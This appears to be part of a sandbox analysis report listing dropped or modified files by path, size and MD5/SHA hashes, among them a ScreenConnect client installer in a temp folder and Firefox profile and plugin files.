SHA512b1cee9458be3579a02b6f7e8d0b76f67a4b2d1f170db2e09af75d9901723e80e68650fe8fbbe43c8f062df7d50889e224b7cd9767027a0d7a5121a4534f2afa4
-
Filesize
1.6MB
MD57099c67fe850d902106c03d07bfb773b
SHA1f597d519a59a5fd809e8a1e097fdd6e0077f72de
SHA2562659f660691d65628d2fcc3bfc334686cd053f162cdb73bf7a0da0ac6449db92
SHA51217849cb444d3ac2cd4658d4eca9dc89652beae6c6a2bd765749d8ba53e37248fd92a00af2b45371c21182135fffa6dd96dc9570bfd41459f23e084c3e122d162
-
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi
Filesize12.8MB
MD5aa58a0c608a2ec60555c011fe3788152
SHA139cb0cda4015b3dcc5e827a74f8f1f0b4e48cf0a
SHA256564acb8e62d7ca9d440895bf347d8312fbfabb3d36eeacf247e115e766f499bd
SHA512ff97035063141aa23a52c4b61c6e9585f66db2d6deed61b0a318e732790f4137af18fdf0fbd6e4648532da3f6a482046a183565cf3c0750101b13bc7d1763b77
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\AlternateServices.bin
Filesize8KB
MD5ab371426531447bcc3d8a3dcc87e9f2c
SHA1a8737fdba6d32fbb34e47989ffb75d166e28afd3
SHA2562fce4cc8a3f539fdd0304b6effbc5cc9f8bcaea1f9d7eae1e78cc1c9c432f4bc
SHA512875a9c4cf1714bc4d8c4b026e2060c67885f063df6b73ae0a6aa895d534f83b0fa01125427d9b9c97abbc4752ab60416b6d72cf163b6ed64a48a8cc9b2739cc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.bin
Filesize23KB
MD5ecac6c063f96837108558c87cc7bce13
SHA19761804bed0d11a21722b06a5f26a6aaacfa5498
SHA256db9bc8fdcd3479fa8dc74f113d38710825f961381758ca9984b254d80079fe33
SHA512b6b4952aada9a2e23f63324fe82d5bc6f3c8288d261ab90356f32e06faa232ca4c544eca083dc89603be1563ae5327fdf5f2273723b5c43578fab74ce4c80313
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.bin
Filesize5KB
MD58da58811006e8878f33ba6d69b9d665c
SHA104da542197621ed5d23d99fc940a52215090d389
SHA2569677d6cc31564878fafdf033dee1662b894f02662d2e6d84701ab5c3939ada0e
SHA512d9186eb47445007c2327e822e8777be2c6812530bcd9ad6e94d369ee1d65dd4540453b6c7015f26e79de0c620c7d3381083047002efb206cc37a513784e9b122
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.bin
Filesize6KB
MD5d1b7e5970b7c8217867f9cd2444191f9
SHA173963fdc1618be715dd4fe4b99544e746d0b3287
SHA2562130c6ad089eef220aab71abed28b9cd7c87d37be2182b7510cc4f40e0be6e58
SHA51232357fb46ea575fe0f69e214043f9e0616e29c2a9c179f7d80bf4e93a46a483c3b87c40cb14bf19a44cc9b7b5908d47a3364fa2b501bf86820955be18495a9a0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD585f8c3d7cd1cba4a6d748dde306f03a3
SHA1d66a018836233c91d480f7fc6a2f8b17f0d9b237
SHA256e94d0e0bee6b08263d66b40cbc85cf4b6982142a65dfd014f6d1ef5dc08efffa
SHA512fbc0765fa0682ba00b9e909c3a70bf50b58d9f63b7028ee5e8ef6ddf8cce9f41177265a20b7317470b166592f5a801401590310740919b28c555e2f1ad358007
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5c12b0e44f49897c4b98139dd6dc94adb
SHA19f410822bbd33a6bd6be0d6752f13858d5aff2ff
SHA256c01f02a6cdc9abc354f3e18fc55fa15bccd727703ea2348d991994e52b3986ae
SHA512175ded0c84ef70f24dbd467b492f70d5bb57eed6f058e3cc5b9a4675890a4431df4752da0c645836e713ff0c1800efe54add78eb120517048bb9b7c7d5c013b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5e0ca0490b056e319938c50169596a01a
SHA1c425fac308ca80fc658a6f7781550e2765159ec0
SHA2560081ba44f6c2b883bfe7603fb1489cfa3333563ba1c49d3b5b3c83d4f08a326f
SHA51270d050dbb6c20edd56b87176ab2a94925d3eebe0cc42c08cec71644fb489706b59885fa0e54387bdd56598ca520d72efa708999fae1b9c02f633a1478fd1044c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5a692d55906a23418fbddaf1c85392a11
SHA18e606e758d25e5d5c7ef5aba9ae2499d29582486
SHA256e8601389275065984d0bfb4c26d54ff08fdf044b83df6e047c1ce622b016b150
SHA5123eaa1863edd86adf67aac8e1538754998a28e2e15cef6b440d83f558e595b76b3ef833f8b5974e1765a495dc2e8b5b5544c9ed42bb97737c7782052cf4705b27
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\2db5c561-e0a1-4145-8e24-f4e0672c0ca1
Filesize982B
MD59d6060289a7f1d1916db8e71e0ca427b
SHA1cfcf9b451601ee51fb2cb8d8ecd38abd42fca223
SHA25622c67e12da46f9e583ec28b370396760f61760b3715aeb415262406b5a874f23
SHA512dc3532014b43347458cd08d7e3cd52621597ed2b6ad75f21ecbabcbb4ff44c3ef4ba584be0b9d43df542bad472f54a5ddd0e5865e36c8474ba3a14a89b8aae3d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\301057d9-42f2-49f5-8d23-26de3467df6f
Filesize27KB
MD52c1514f89d5bb5c4eaf615ea54c17af6
SHA1d7cdc06ba29e75c57cccbae51e2b7f727f5b67f3
SHA2562e89352a2817b960ffcc4dcc8dc488651ec32931639b51498f2b2aa6b4426a47
SHA5120537405fe6060b6ca5070340f852e4e0f2594b8daa3805e93ae7365cd45c1535fd45765204b449143175bb11d8bd14be37b1ffc7a6dde57c175d2ee4ffce91c4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\f84308fc-b1b5-4cfb-9717-a18b879911c7
Filesize671B
MD5fdcfdf3dcc11ac6a98d31218a9e4faa5
SHA1495f21c82bc822562bc7c32e3f77a83beae95486
SHA2561e93045601b87cd54a550fb2dcb13211175da1f4086bfdb902745b48510b9357
SHA5120503aeb6628c2ba932f1c50cf4dff2dc5da70bae31617dcfa773791b765747d0b73c66d19383867ba6cf66343fb3e4f79fb0e6cc1b36fb3c9489f694ee3ff5a0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD586a4d51e857015ae1da30b3cb84fb6d3
SHA1f802c612b609f43c68de9034ac7dc187df565c8b
SHA256154175746a341f9f23f362c0c54525c8a2f69b87fdf62246ebfbfef87a09a95b
SHA5120ed1547743c1b0e3d58ce202be62eac4ebf21fbf702e58b89e02053cf6da79537855bb52d953858641b93383bb8c14d1c743b6d778dc8d27b4c730e5a97bbf48
-
Filesize
15KB
MD5d94ddc96f46e698ca0ef0bbb52eaa386
SHA14395e5425a8b55ab9eb6d7129361060228d1e334
SHA256bd17ecf0c321a6dd89ac19adce6afd47951eda909e45e460ca7fa10f165739bf
SHA5127ff9d1e72bdc3935c560a0fec7043d770fb4ab222e895e462a4d9061ef818cebaaee2d7b9e8e332833bc07f70ee4a5717a5b35e9631d096a2f222090c9db3b8c
-
Filesize
10KB
MD5c5caf793b04a22dddd1b1a7565e81182
SHA1df7ec076db983b914588948608943ea8f200b1a3
SHA2561558fe192b36845ee9fdce5571a21c258358fd8e5b8a150a9456a3d365d1ff17
SHA512316e2245f31ef8476d7aeded10695946c1af6b4d3567acdf060a9b690a7ce3d9b4c17869db64ad0235f1344590311383d3ffb176952c2bec93e3ed1556236f4e
-
Filesize
202KB
MD5ba84dd4e0c1408828ccc1de09f585eda
SHA1e8e10065d479f8f591b9885ea8487bc673301298
SHA2563cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA5127a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290